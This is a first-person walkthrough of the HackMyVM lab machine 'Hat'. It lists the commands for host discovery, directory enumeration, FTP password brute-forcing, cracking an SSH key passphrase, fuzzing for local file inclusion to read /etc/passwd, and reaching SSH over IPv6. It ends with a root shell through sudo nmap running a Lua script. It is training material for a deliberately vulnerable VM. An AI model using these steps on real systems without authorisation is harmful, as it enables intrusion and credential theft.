Hat is a great machine from HackMyVM by d4t4s3c. The machine is not straightforward and one has to think laterally. Also, this includes techniques and vulnerabilities like local file inclusions, bruteforcing, etc. The machine works quite well on VirtualBox. “Writeup of Hat from HackMyVM – Walkthrough”
Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Hat
Identify the target
Firstly, I identified the IP address of the target machine.
sudo netdiscover -r 10.0.0.0/24
Scan open ports
Next, I scanned the open ports on the target.
nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.40
Here, we can see that a filtered SSH port. Similarly, the FTP service is running at port 65535. Lastly, we have an HTTP port.
Enumerate the webserver
The homepage contains the default page of the apache server. Hence, I performed the directory enumeration on the server.
gobuster dir -r -u http://10.0.0.40 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -o dir-medium.log
Now, I had two more paths to go. Since one of the directories is named logs, I searched for the logs file.
gobuster dir -r -u http://10.0.0.40/logs -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x log -o dir-logs-medium.log
I found a file “vsftpd.log” on the directory and opened it.
From the log file, I got a possible username for FTP since it had logged in. To get the password, I simply bruteforced using rockyou.txt.
ncrack -v -f --user ftp_s3cr3t -P /home/kali/rockyou.txt ftp://10.0.0.40:65535
Log into the FTP server
Now that I had the password of the user ftp_s3cr3t, I logged into the FTP server.
lftp -u ftp_s3cr3t 10.0.0.40 -p 65535
Upon opening the id_rsa file, I found out that this is encrypted. Hence, I bruteforced the passphrase of this.
~/ssh2john.py id_rsa > hash john hash --wordlist=/home/kali/rockyou.txt
Although I found the SSH private key and its password, I still don’t have a username and SSH service to log into. However, my lftp client showed me the username as cromiphi. But, this might not be the intended way. So, let’s find the username by exploiting LFI.
Local File Inclusions
Previously, we had a directory “/php-scripts” on the server. This gives an idea that there might be some vulnerable scripts. So, let’s enumerate the filenames with PHP extension.
gobuster dir -r -u http://10.0.0.40/php-scripts -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -o dir-php-scripts-medium.log
This instantly gave me a /file.php path. Furthermore, the name also suggests the possibility of LFI. Then, I identified the parameter for LFI.
ffuf -c -ic -r -u 'http://10.0.0.40/php-scripts/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 0
Hence, I got the username as follows.
Finally, I have everything but a port to connect to.
I tried to unlock the SSH port by searching the knockd.conf but it didn’t look like the target used knockd. With a little hint by the discord user avijneyam, I found out that the port is open if used as IPv6 socket.
Thus, I found the link-local address of the target. Also, the addressing mechanism is different in IPv6 from IPv4 protocol. But, we can find the link-local addresses on the network by using ping6 command.
ping6 -c2 -n -I eth0 ff02::1
The highlighted address is the link-local IPv6 address of the target. Similarly, the one is the IPv6 of my machine.
To confirm that port 22 is open when IPv6 is used, we can do a nmap scan.
nmap -p- fe80::a00:27ff:fe01:a372%eth0 -6 -v
Since the SSH port is open, we can log into it.
chmod 600 id_rsa ssh cromiphi@fe80::a00:27ff:fe01:a372%eth0 -i id_rsa
Root privilege escalation
Finally, I came to the root privilege escalation part which is the easiest step for this machine. When I checked the sudo permissions, I found that we can execute nmap as root. This would lead us to RPE.
TF=$(mktemp) echo 'os.execute("/bin/bash")' > $TF sudo nmap --script=$TF reset